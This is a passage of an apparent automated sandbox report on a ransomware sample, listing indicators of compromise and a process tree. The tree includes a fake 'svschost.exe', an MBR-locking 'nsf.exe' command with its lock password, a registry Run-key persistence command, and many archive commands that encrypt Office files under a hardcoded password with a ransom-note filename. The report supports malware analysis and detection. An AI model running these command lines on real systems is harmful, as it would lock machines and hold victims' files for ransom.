2848	PING.EXE
264	PING.EXE
2572	PING.EXE
2700	PING.EXE
2980	PING.EXE
1684	PING.EXE
1492	PING.EXE

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
3028	nsf.exe
1700	nsf.exe
2824	nsf.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2496 wrote to memory of 2380	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	30
PID 2496 wrote to memory of 2380	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	30
PID 2496 wrote to memory of 2380	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	30
PID 2496 wrote to memory of 2380	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	30
PID 2496 wrote to memory of 2380	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	30
PID 2496 wrote to memory of 2380	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	30
PID 2496 wrote to memory of 2380	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	30
PID 2496 wrote to memory of 3028	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	31
PID 2496 wrote to memory of 3028	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	31
PID 2496 wrote to memory of 3028	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	31
PID 2496 wrote to memory of 3028	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	31
PID 2496 wrote to memory of 3028	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	31
PID 2496 wrote to memory of 3028	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	31
PID 2496 wrote to memory of 3028	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	31
PID 2496 wrote to memory of 2836	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	32
PID 2496 wrote to memory of 2836	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	32
PID 2496 wrote to memory of 2836	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	32
PID 2496 wrote to memory of 2836	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	32
PID 2496 wrote to memory of 2836	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	32
PID 2496 wrote to memory of 2836	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	32
PID 2496 wrote to memory of 2836	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	32
PID 2496 wrote to memory of 2600	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	34
PID 2496 wrote to memory of 2600	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	34
PID 2496 wrote to memory of 2600	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	34
PID 2496 wrote to memory of 2600	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	34
PID 2496 wrote to memory of 2600	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	34
PID 2496 wrote to memory of 2600	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	34
PID 2496 wrote to memory of 2600	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	34
PID 2496 wrote to memory of 2744	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	36
PID 2496 wrote to memory of 2744	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	36
PID 2496 wrote to memory of 2744	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	36
PID 2496 wrote to memory of 2744	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	36
PID 2496 wrote to memory of 2744	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	36
PID 2496 wrote to memory of 2744	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	36
PID 2496 wrote to memory of 2744	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	36
PID 2496 wrote to memory of 2572	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	38
PID 2496 wrote to memory of 2572	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	38
PID 2496 wrote to memory of 2572	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	38
PID 2496 wrote to memory of 2572	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	38
PID 2496 wrote to memory of 2572	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	38
PID 2496 wrote to memory of 2572	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	38
PID 2496 wrote to memory of 2572	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	38
PID 2496 wrote to memory of 1492	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	40
PID 2496 wrote to memory of 1492	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	40
PID 2496 wrote to memory of 1492	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	40
PID 2496 wrote to memory of 1492	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	40
PID 2496 wrote to memory of 1492	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	40
PID 2496 wrote to memory of 1492	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	40
PID 2496 wrote to memory of 1492	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	40
PID 2496 wrote to memory of 2968	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	42
PID 2496 wrote to memory of 2968	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	42
PID 2496 wrote to memory of 2968	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	42
PID 2496 wrote to memory of 2968	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	42
PID 2496 wrote to memory of 2968	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	42
PID 2496 wrote to memory of 2968	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	42
PID 2496 wrote to memory of 2968	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	42
PID 2496 wrote to memory of 2980	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	44
PID 2496 wrote to memory of 2980	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	44
PID 2496 wrote to memory of 2980	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	44
PID 2496 wrote to memory of 2980	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	44
PID 2496 wrote to memory of 2980	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	44
PID 2496 wrote to memory of 2980	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	44
PID 2496 wrote to memory of 2980	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	44
PID 2496 wrote to memory of 848	2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	46

C:\Users\Admin\AppData\Local\Temp\3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
"C:\Users\Admin\AppData\Local\Temp\3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe"
1⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:2496
- C:\Windows\SysWOW64\svschost.exe
  "C:\Windows\system32\svschost.exe" -i
  2⤵
  - Executes dropped EXE
  PID:2380
- C:\Windows\SysWOW64\nsf.exe
  "C:\Windows\system32\nsf.exe" /nobootpass /lock Yrs5S2z1
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Writes to the Master Boot Record (MBR)
  - Suspicious use of SetWindowsHookEx
  PID:3028
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2836
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2600
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2744
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2572
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:1492
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2968
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Location Discovery: System Language Discovery
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2980
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:848
- C:\Windows\SysWOW64\svschost.exe
  "C:\Windows\system32\svschost.exe" -i
  2⤵
  - Executes dropped EXE
  PID:1388
- C:\Windows\SysWOW64\nsf.exe
  "C:\Windows\system32\nsf.exe" /nobootpass /lock Yrs5S2z1
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Writes to the Master Boot Record (MBR)
  - Suspicious use of SetWindowsHookEx
  PID:1700
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:1728
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2504
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2812
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:1684
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2172
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:1392
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2676
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:1832
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2920
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2168
- C:\Windows\SysWOW64\svschost.exe
  "C:\Windows\system32\svschost.exe" -s
  2⤵
  - Executes dropped EXE
  PID:1204
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2072
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2848
- C:\Windows\SysWOW64\svschost.exe
  "C:\Windows\system32\svschost.exe" -i
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2436
- C:\Windows\SysWOW64\nsf.exe
  "C:\Windows\system32\nsf.exe" /nobootpass /lock Yrs5S2z1
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Writes to the Master Boot Record (MBR)
  - Suspicious use of SetWindowsHookEx
  PID:2824
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:992
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2812
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2468
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:112
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2700
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2024
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:264
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:1652
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2508
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2840
- C:\Windows\SysWOW64\svschost.exe
  "C:\Windows\system32\svschost.exe" -s
  2⤵
  PID:1428
- C:\Windows\SysWOW64\svschost.exe
  "C:\Windows\system32\svschost.exe" -s
  2⤵
  PID:2440

C:\Windows\SysWOW64\svschost.exe
C:\Windows\SysWOW64\svschost.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Drops file in System32 directory
PID:908
- C:\Windows\SysWOW64\REG.exe
  REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchost" /t REG_SZ /d "C:\scrlk\svchost.exe" /f
  2⤵
  - Adds Run key to start application
  PID:872
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\Office64WW.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\Office64WW.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2076
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ProPlusWW.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ProPlusWW.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2332
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\Setup.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\Setup.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Executes dropped EXE
  PID:896
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\ExcelMUI.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\ExcelMUI.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3016
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Setup.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Setup.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1512
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\PowerPointMUI.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\PowerPointMUI.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2940
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\Setup.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\Setup.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2788
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\PublisherMUI.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\PublisherMUI.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2720
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\Setup.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\Setup.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2692
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\OutlookMUI.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\OutlookMUI.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Executes dropped EXE
  PID:348
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\Setup.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\Setup.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1708
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\Setup.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\Setup.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2396
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\WordMUI.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\WordMUI.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1936
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en\Proof.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en\Proof.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2120
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.es\Proof.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.es\Proof.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1544
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\Proof.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\Proof.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1916
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proofing.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proofing.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2672
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Setup.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Setup.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1616
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\InfoPathMUI.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\InfoPathMUI.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Executes dropped EXE
  PID:320
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\Setup.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\Setup.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2124
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\OneNoteMUI.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\OneNoteMUI.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1732
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\Setup.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\Setup.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2440
- C:\ProgramData\msvkp\svchost.exe
